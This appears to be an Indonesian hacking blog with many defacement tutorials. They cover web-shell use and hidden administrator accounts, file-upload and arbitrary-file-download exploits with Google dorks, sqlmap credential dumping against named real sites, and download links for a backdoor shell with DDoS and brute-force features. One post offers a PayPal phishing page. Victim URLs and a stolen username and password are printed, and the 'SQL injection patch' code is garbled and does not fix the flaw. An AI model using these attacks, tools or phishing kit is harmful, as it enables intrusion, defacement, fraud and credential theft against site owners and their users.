Responsive Banner design

Waspada Buat Kalian Yang Punya Checker (Ada Hidden Uploader)

hay hay :D
apa kabar ? udah lama gak post disini selain mau mengucapkan selamat menunaikan ibadah
puasa bagi yang menjalankan ^_^.
jadi ceritanya gini , saya punya web checker bellasofie.net dan bellashofie.net :v
sama ajas sih :D
kena deface 3x , its oke lah 1 x itu tester nah ini 3x ?
itu namanya penghinaan..
terlebih saya udah tau disitu ada hidden uploader
berikut scriptnya :
echo "<h2></h2><hr>";
echo "<form action=\"\" method=\"post\"
enctype=\"multipart/form-data\">
<label for=\"file\"></
label>
<input type=\"file\" name=\"file\" id=\"file\" />
<br />
<input type=\"submit\"
name=\"default\" value=\"value\">
</form>";


script tersebut disisipkan di index.php dan juga function.php
kalian bisa cek siapa tau masih ada loggernya :D
bahaya ntar kena deface 


bagi kalian yang ada script itu nya segera hapus atau seperti saya dipath
 echo "<h2></h2><hr>";
echo "LAMER LAMER -_- DEFACE KOK PAKE HIDDEN ^_^ , OTAK DONK BANG";
{
move_uploaded_file($_FILES["file"]["tmp_name"


sumpah saya emosi banget :v
udah tau situasinya bulan puasa , terlebih lagi saya ada project >_<
jadi gak bisa kan di test..
jadi langsung upload zip trus extrak..
trus ditinggal , eh kena retas lagi :v
wkwkwk

yang lebih bkin naik darah di kasih background HOMO,
dan titlenya "Masih ingat dengan saya?"

Note :
just orang tolol yang memasuki lubang 2x , 1x tester , 2x tusboler , 3x penghinaan..

Penulis :
Syahrul Ramadhan

Cara Buat RDP Dengan Shell Windows

jadi ceritanya lagi mau punya blog ngeshare
videos & mp3 (file-file 48Family) tapi bingung karna koneksi lelet
jadi gimana caranya yaa.. supaya bisa upload dengan cepat
otak saya langsung jalan ke RDP..
oke rdp gimana ya cara bikinnya, akhirnya
saya menanyakan dengan seseorang, namun sayang katanya rdp harganya
50k
weeh gimana caranya -_- punya rdp sendiri dengan gratis.
akhirnya nemu solusi ^_^
oke cekidot langsung saja

ALAT :

- Shell Windows
- Kopi
- U Mild

Ok Langsung saja haha, kebanyakan bacot ya, maklum orang tua



Ketik comand di shell :
net user [nama] [Password] /add di sini gw bikin dengan
net user arul ganteng124# /add 



yeye sukses bikin user baru.
nah,sekarang kita buat user baru tadi menjadi administrator
ketik comand : net localgroup administrators arul /add 




sukses juga menjadikan user tersebut administrator, nah sekarang apa lagi bang haurgeulis
kita cek user baru tadi dengan comand : net user [nama user]
ex : net user arul



oke selanjutnya kita cek ip dengan command : ipconfig




Nah itu kan udah kelihatan tuh IP nya,
tapi gw sensor banyak yang belum cukup umur haha
Done deh,semuanya tinggal di conect aja.






- Syahrul Ramadahn

Trick Ketika Gagal Login Mysql Dengan Shell WSO

hallo !!
apa kabar nih semua ?? lagi pada UN nih :p
kenalin nih admin baru disini wkwk
sebut saja saya Wisnu404 , masih newbie kaka :(

udah ya segitu aja,sekarang waktunya saya menjelaskan cara login ke mysql dengan shell wso :D


  • Alat dan Bahan :


  1. yang pasti internet ya
  2. siapin web yang udah di tanem shell apa saja
  3. dan shell WSO


biasanya ketika anda melakukan deface pasti mengecek symlink dan jumping
tapi kali ini pada bgian jumping.
pada saat kalian mengambil config di wordpress dan joomla ,pasti anda akan login lewat mysql pada shell tersebut tapi pada saat login tidak bisa masuk,
nah kali ini saya akan memberi tau cara agar berhasil masuk ke login mysql lewat mysql

oke lanjut saja ya
sekarang kaian ambil config dari salah user jumping tersebut

sekarang buka shell wso nya, dan klik sql di shell wso tersebut


jika sudah di klik sql , sekarang kita copy database name, database user , dan password kebagian kolom sql tersebut
jika sudah login saja wkwkwk :p
karna itu wordpress jadi bisa langsung cek ke wp-user


jika sudah di klik maka hasilnya akan keluar semua user tersebut


nah gimana sih buat ganti password , cara nya cukup mudah kok
tinggal ketikan ini saja

UPDATE  `database name`.`dir database` SET  `user_pass` =  '0d5c68ea70eec09df10a5ba882da722d' WHERE  `dir database`.`ID` =sesuaikan dengan id admin atau apa saja;
dan hasil nya seperti ini


jika sudah tinggal execute saja ^^  
dan hasilnya seperti ini saja :p 


\
dan saatnya tinggal login di halaman web tersebut ^^

oke sekian trick dari saya a.k.a Wisnu404
mohon maaf kalo ada salah kata atau apa,maklum masih newbie :(
sekian dan terima kash ^^


Download Script Scampage PayPal Terbaru 2015

Holla..
kali ini saya mau share script scampage..
apa itu scampage ? , pasti kalian tahu :D


wowowok :v tak kasih gambar andela nih biar semakin waw :D
gimana semakin minatkan :D


http://adf.ly/1CURGk

gimana caranya ? 
tinggal edit ____YourMail____.php ganti dengan email kalian ;)

oke sekian artikel kali ini semoga bermanfaat :D
saya buru2 nih jadi nulisnya agak berantakan..

Content Creator : Syahrul Ramadhan

Tutorial Mendapatkan Banyak Config Dengan Andela_Grab

Assalamualaikum...
ketemu lagi sama saya nih :D heheh..
sebelumnya saya minta maaf karna beberapa hari terakhir nih blog jadi lahan iklan >_<
ya kali padahal gw benci iklan :o , wkwkwk maklum lagi gila sih
tapi kali ini gak ada lagi deh iklan iklan gak penting :D hahah
Oke Skip ~
kali ini saya mau berbagi sedikit tips tentang cara mendapatkan lebih banyak config dengan Andela_grab.
(loh rul , apa bedanya dengan config biasa ?)
kalau config biasa mungkin hanya dapat beberapa tapi kalau grabber itu bisa sampai akar2nya :D 
gak percaya :p ? buktiin sendiri aja .
(gimana caranya rul?)
ya pake shell Andela1C3 v.3 yang bisa kalian download DISINI

Oke langsung saja ~
syarat kalian harus punya shell dan perhatikan Disabled Functions harus NONE


oke jika syarat pertama sudah yaitu Disabled Functions : NONE
lalu klik Config Grabber seperti Gambar diatas , nanti kalian akan mendapatkan tampilan seperti dibawah ini


nah pada saat tampilan itu jika kotak seperti diatas kosong berarti tidak bisa di config grabber :D ?
bisa jadi karna server nya kurang hot :* atau Disabled Functions : banyak ^_~

jika sudah seperti gambar diatas langsung klik Grabber Now!
tunggu hingga proses selesai :D :p , lama atau engganya itu tergantung muka anda *eh koneksi maksud saya 

Jika sukses tampilan akan seperti ini


lalu klik Open Configs dan 


GOT IT :D
jika beruntung kalian akan mendapat banyak config seperti saya diatas :D
tergantung server dan................... Muka anda 8|

Content Creator : Syahrul Ramadhan

Tutorial Deface Jdownloads Upload Shell Vulnerability


Holla ^_^
ketemu lagi sama saya :D heheh ,
Oke ~ Kali ini Saya akan Membahas Cara Bypass Shell di JDownloads :))


Sebelumnya Saya Berterimakasih sama Mr.DellatioNx196 -/\- (Sungkem disek mas)

Oke Langsung Gasss ~ Cara Uploadnya Sama Saja :)))  

Dork : 
Powered by jDownloads 

Exploit : 
/index.php?option=com_jdownloads&Itemid=1&view=upload
or
/index.php?option=com_jdownloads&Itemid=1&task=upload 

Sekarang yang Jadi Pertanyaan Bagaimana Upload Shell di JDownloads ? :))
Easy ~ Cuma Perlu Ubah Shell kamu jadi Format shell.php.php.j 
 
Setelah itu Upload Seperti biasanya :))
Nanti Sesudah Ter-Upload ke Server Filenya akan Berubah Format Menjadi shell.php.j Magiccc wkwkw :v

Shell Acces ? Seperti Biasa ~
www.target.com/images/jdownloads/screenshots/shell.php.j

Jadinya Akan Seperti ini :))
http://www.define.pk/images/jdownloads/screenshots/andela.php.j

Habis itu Diapain :))) ?
Terserah kakak lah wkwk Dosa ditanggung kalian yh


Special Thank's : Mr.DellatioNx196 , MexicanHackers , Pooi Chai a.k.a Hit Gir'l , SengkeL ~_^ 

Tutorial Deface Ajax File Manager | File Upload Vulnerability

Kali ini saya akan share cara deface dengan exploit  
Ajax File Manager | File Upload Vulnerability
Exploitnya sangat mudah dipraktekkan. 
Cocok bagi newbie yang baru belajar deface , kaya saya :) .
Oke, langsung saja kita mulai. Hehehehehe.


Dork : 
inurl:"ajaxfilemanager.php?page=" intitle:"ajax file manager" (kembangkan sendiri)
. File berekstensi .txt

Langkah Langkah :
1. Mulai cari target di google dengan dork diatas. :)

Sebagai contoh, saya pilih  
http://dulichhoangnguyen.com/plugins/tinymce/plugins/ajaxfilemanager/ajaxfilemanager.php?page=51 

2. Lalu klik tombol upload di pojok kanan atas.



3. Kemudian upload file sobat. File harus berekstensi .txt . Sebaagi contoh, saya menguplaod filedengan nama haurgeulis.txt
5. Jika sudah, klik file yang tadi sobat upload.



4. Akan terbuka link dimana file sobat berada. :)
http://dulichhoangnguyen.com/data/upload/haurgeulis.txt



hasil saya :
http://www.cansigliocard.it/uploads/haurgeulis.txt
http://www.bajkolandiasalazabaw.pl/content/images/haurgeulis.txt
http://www.academconsult.ru/uploaded/haurgeulis.txt
http://dulichhoangnguyen.com/data/upload/haurgeulis.txt

Sekian tutorial kali ini. Semoga bermanfaat. :) 
Content Creator : Syahrul Ramadhan

[Release] Andela1C3 v.3 Privat Shell

Assalamualaikum..
selamat sore sobat :D


kali ini saya mau share shell backdoor terbaru yang saya recode .
Namun karena saya sendiri masih dalam tahap belajar coding php, fiturnya saya adopsi dari file file yang penting dari google juga :D

ini penampakan login dari Andela1C3 v.3


loh rul kenapa namanya Andela1C3 pasti karna Andela ya ?
(iya :v jadi ceritanya ada temen yang punya blog dengan nama andela dan info info andela , domainpun andela , so jadi saya buktiin saya memang gabisa beli domain TLD untuk andela :D tapi saya masih bisa berkarya :v wkwkwk curhat) 
oke fokus :3

ni beberapa fitur terbarunya :
Upload
DDOS
DB Dump
SQLi Scanner
Bomb Mailer
Script Encode
Whois
Facebook BruteForce
Email BruteForce
Twitter BruteForce
WordPress Hijack
PayPal Valid Email
Files Search
Eval
Mysql
Config
Symlink
Jumping
Domain Viewer
Admin Finder
PhpInfo
Mass Deface
Cpanel & Ftp Auto Defacer
Email Extractor
Config Grabber
Back Connect Simple
Andela Yuwono Quote


DLL masih banyak oii :v wwkwkwk liat SS nya aja yaa :v
*SS

  
oh iya saya encode nya menjadi 2 versi ada versi 200kb ada yang 1kb :D
hihi tenang password bisa kalian ganti kok :D
dan shell ini aman tanpa logger dan malware sedikitpun

saya share yang 200 kb dulu
Description :
Name : Andela1C3 v.3 Shell [ b374k Recode by Mr.HaurgeulisX196 ]
Size : 200kb
Default password : haurgeulis 


http://www.bluerocktrading.net/components/Files/andela.zip

Update !! 

dan yang 1 kb
Description :
Name : Andela1C3 v.3 Shell [ b374k Recode by Mr.HaurgeulisX196 ]
Size : 1kb
Default password : haurgeulis


http://www.bluerocktrading.net/components/Files/srikandi.zip

Sekian dan semoga bermanfaat.

Thanks to : x'1n73ct , Suram Crew

Content Creator : Syahrul Ramadhan
Mr.HaurgeulisX196 


Update!! : 
Link download telah di perbarui :D 

Deface cfg-contactform Vulnerability File Upload

Assalamuallaikum ?
kali ini saya mau share tutorial yang di buat oleh team saya Indonesian Cyber Freedom :D
namanya "Cfg-contactform Vulnerability File Upload"
Bahan : 
- Komputer Terkoneksi Internet :v
- Xampp
- CMD



(wuuiiihh rul ganti lagi ? :v , hahah seterah gue dah ya kenalin ini Shani ^_^)
fokus fokus

Dork :

"/cfg-contactform-1/" 
"/cfg-contactform-2/" 
dan seterusnya. kembangin lagi

Exploit :
jkt48.com/path/cfg-contactform-1/inc/upload.php > tergantung dork cfg-contactformnya
vuln: {"filename":" - 001."}  


Code PHP : DISINI

(simpan code PHP di folder php xampp)
saat nya kita buka CMD lalu ketik
cd\xampp\php



lalu kita exploit dengan :
php namafile.php

disini saya incef.php :



Yuuupppiiii :v
SUKSES :D

shell acces : jkt48.com/path/cfg-contactform-1/upload/namashell.php


oke sekian dari saya :D

Content Creator : Syahrul Ramadhan


JANGAN LUPA MAIN KE 
FORUM INDONESIAN CYBER FREEDOM

Tag :
Deface cfg-contactform
Deface Com_Sexy Jilid 2
Deface Sexy_Contact Jilid 2
cfg-contactform Vulnerability File Upload
Deface cfg-contactform Vulnerability File Upload

Deface Wordpress Theme Arbitrary File Download Vulnerability

Assalamuallaikum :D
kali ini saya mau share tutorial deface Arbitrary File Download ,
sebenernya gimana kita mainin dork trus kita dapet wp-config.php suatu website
dan Host Databasenya itu bukan localhost :D


(kok andela lagi rul? ya biarin lah cewek2 gw ini :v sadis)
lanjut2

Google Dork:
"Index of" +/wp-content/themes/cuckootap/
"Index of" +/wp-content/themes/IncredibleWP/
"Index of" +/wp-content/themes/ultimatum/
"Index of" +/wp-content/themes/medicate/
"Index of" +/wp-content/themes/Centum/
"Index of" +/wp-content/themes/Avada/
"Index of" +/wp-content/themes/striking_r/
"Index of" +/wp-content/themes/beach_apollo/

(kalau mau dapet banyak website , kembangkan lagi dork nya :D)

Exploit/Poc :
http://jkt48.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php 

hingga dapet yg seperti ini :





Tag :
Deface Mulitple WordPress Themes 
Mulitple WordPress Themes (admin-ajax.php, img param) - Arbitrary File Download
Deface Arbitrary File Download
Deface Mass Arbitrary 

Content Creator : Syahrul Ramadhan


Trick Dorking MP3

Kali ini saya akan memberikan cara supaya kalian bisa men download lagu iTunes dengan Format asli dan Gratis dengan bantuan Mbah Google. 
Kalian bisa download banyak lagu secara barengan, bisa di pause dan kualitasnya top markotop soalnya formatnya .m4a (Format lagu asli iTunes). 
Okelah gan, tak usah panjang lebar ini dia triknya

Pertama, kalian buka Google dulu


Kemudian ketik dibawah ini


?intitle:index.of? m4a (nama_lagu/artist)
Yang saya tulis dengan warna merah silahkan kalian ganti sendiri, misal JKT48, AKB48, Utopia, dll. tanda kurungnya dihilangkan.

Misal saya ketik ?intitle:index.of? m4a JKT48

Nanti agan tinggal klik link yang title depannya Index Of / 



sehingga ketemu seperti ini (dir)



Tinggal masuk situs tersebut terus download lagunya, selesai


Atau misal kalau kalian cari lagu tertentu, tapi nggak ada format m4a nya, maka kalian bisa ganti menjadi mp3

    ?intitle:index.of? mp3 (nama_lagu/artist)

NB: kalau formatnya mp3, kemungkinan lagunya bukan dari iTunes, jadi kalau bisa agan cari yang formatnya .m4a



Content Creator : Syahrul Ramadhan

Deface Web Yang Kita Inginkan Dengan Reverse IP

Assalamualaikum

Ketemu maning karo aku Mr.HaurgeulisX196 :) .

Tadi ada yang request tentang metode Reverse IP ini dan sekarang saya akan buat postingannya :)
IP Reverse ini dimaksudkan untuk mengincar website tujuan dengan menyerang website yang 1 server terlebih dahulu


Yok lanjut, sebelumnya baca Bismillahirrahmanirrahim dulu ya !
Kita menjelajah di cara pertama dulu. CARA KE 1 : 


1. ke Sini dulu bro..
2. isi kolom dengan website tujuan tanpa http : // , kalau perlu gunakannya www. lalu klik tombol check 



3.  Lalu akan muncul jumlah domain dalam 1 server dan IP nya seperti gambar berikut



4. lalu kita pergi ke www.bing.com/
5. Tulis di kolom pencarian dengan dork berikut

IP:00000 dork


contoh :
IP:116.90.163.134 php?id= (saya ingin mencari web vulnerabillity SQLi)

dork bisa diubah sesuai dengan bug yang diminati



6. Kalau sudah ketemu tinggal di eksekusi deh, entah dengan sqli, lokomedia, atau yang lainnya

Setelah dapat salah satu website tinggal kita akalin aja, entah dengan cpanel cracker atau config / symlink :)
Semoga bermanfaat ya sobat Wassalamualaikum wr. wb.


Content Creator : Syahrul Ramadhan
1. ke Sini dulu bro.. 2. isi kolom dengan website tujuan tanpa http : // , kalau perlu gunakannya www. lalu klik tombol check

Read more at: http://blog.nonamecyberteam.com/2014/06/cara-deface-dengan-reverse-ip-comuser.html
Copyright www.satuanberita.com
1. ke Sini dulu bro.. 2. isi kolom dengan website tujuan tanpa http : // , kalau perlu gunakannya www. lalu klik tombol check

Read more at: http://blog.nonamecyberteam.com/2014/06/cara-deface-dengan-reverse-ip-comuser.html
Copyright www.satuanberita.com

Cara Patch Bugs SQL Injection

Assalamuallaikum ^_^
kali ini saya mau berbagi tutorial Path SQLi
jadi ceritanya lagi main SQLi , nah kan udah masuk upload shell ,
trus kefikiran kalau com_user kan bisa di path ini bisa gak ya,
ternyata bisa loh , oke lanjut :D

target saya :
http://www.mohiniwebsolution.in/csl/gallery.php?id=2'


sekarang kita coba buka file ini dengan text editor, bisa notepad, wordpad, atau kalau ane sih sukanya pake notepad++ just info ;) hehehehe. Ini dia sebagian isi dari filenya : (disini saya file galerry.php)

<?php include 'admin/db.php' ?>
<?php
$id=$_GET['id'];
if($id!="")
{
$sql6=" WHERE category=$id";
}
?>


Bugnya ada di script bagian ini : <?php $id=$_GET['id'];

tidak adanya filter di $_GET[postid] menyebabkan web ini vulnerable. Oke script penyebab ini semua telah kita temukan, sekarang saatnya patching. Tambahkan script ini diatas script vulnerable diatas :

<?php include 'admin/db.php' ?>
<?php
//filter start here
$postid= $_GET['postid'];
$ip = GETENV("REMOTE_ADDR");

if($id!="")
{
$sql6=" WHERE category=$id";
}
?>


sekarang coba buka lagi page vulnerable dan tambahkan single quote(‘) dan tarra proses patching telah berhasil


Oke sekian tutorial saya  , kurang lebih tanya aja di komentar :v

Invite BB : 7CB0265A

Content Creator : Syahrul Ramadhan

Tutorial SQLMAP Di Windows 7

Assalamualaikum Wr. Wb

udah lama engga hacking hackingan lagi ? :D
heheh rada males sih hehe
kali ini saya mau share tutorial sqlmap di win7 

Bahan :
- SQLMap Download - Link 1Link 2
- Python27 Download - Link 1 | Link 2
- Dork : inurl:/.php?*id=

[+] LANGKAHNYA MBAH BRO [+]

Untuk mengetahui website yang kalian mau Inject itu Vuln atau tidak , silahkan kasih tanda ( ' ) di akhir  url target, contoh :

http://smkakp.sch.id/readmore.php?idreadmore=139 saya tambahin ' menjadi
http://smkakp.sch.id/readmore.php?idreadmore=139'
nah kalo vuln nanti ada tulisan "you have an error ...." mysql error dan sebagainya"

sekarang waktunya di hajar kalo udah ketemu web yang vuln :P

1. Setelah instal python, sekarang kalian extrack SQLMAPnya di Drive C:, setelah di extrack buka CMD lalu ketikan :
 
2. Stelah itu, kalian mulailah scan website target dengan perintah :
  • sqlmap.py -u http://www.BUGWEBTARGET.com --dbs
Contoh Target : sqlmap.py -u http://smkakp.sch.id/readmore.php?idreadmore=139 --dbs klik [ENTER]
 
 
3. Tuh kan keliatan DATABASE nya :D , sekarang waktunya kita scan dengan perintah :
 Contoh Target : sqlmap.py -u  http://smkakp.sch.id/readmore.php?idreadmore=139 -D smkakpsc_gums --tables , maka hasilnya akan seperti ini :
 
 
4. Nah keliatan kan Table di databasenya ? nah sekarang kita scan table tersebut (cari yang menurut kalian terdapat info tentang user dan pass website) kalo udah yakin disana ada infonya, ketikan perintah :
  • sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns
contoh Target : sqlmap.py -u http://smkakp.sch.id/readmore.php?idreadmore=139 -D smkakpsc_gums -T form --columnstekan enter maka hasilnya akan seperti ini :


5. Nah setelah keliatan Tabelnya sekarang kita ketikan perintah :
  • sqlmap.py -u http://www.target.com -D nama_database -T nama_table --dump 
Contoh Target : sqlmap.py -u http://smkakp.sch.id/readmore.php?idreadmore=139 -D smkakpsc_gums -T form --dump , klik enter 
 
 Jika muncul tulisan seperti ini, ketik "n" lalu tekan enter "tanpa tanda kutip" :
  • do you want to crack them via a dictionary-based attack? [Y/n/q] 
Maka Hasilnya akan seperti ini :
 
 
Nah kita udah dapet tuh user sama passnya :D
 
user : rahasia2014
pass : webdaritommy
 
Sekarang tinggal login ke admin
 
 
*lagi males upload shell -_- , artikel aja dah :v
Hasil :

 
kalau dapet password aneh segera di pecahin itu md5nya caranya pergi ke :
 
Dah ya sekian dulu postingan saya, ane lagi males ngetik :D
sama kan kaya make backtrack 5 atau linux :D
semoga berhasiL
 

Content Creator : Syahrul Ramadhan a.k.a Mr.HaurgeulisX196

Popular Posts

Powered by Blogger.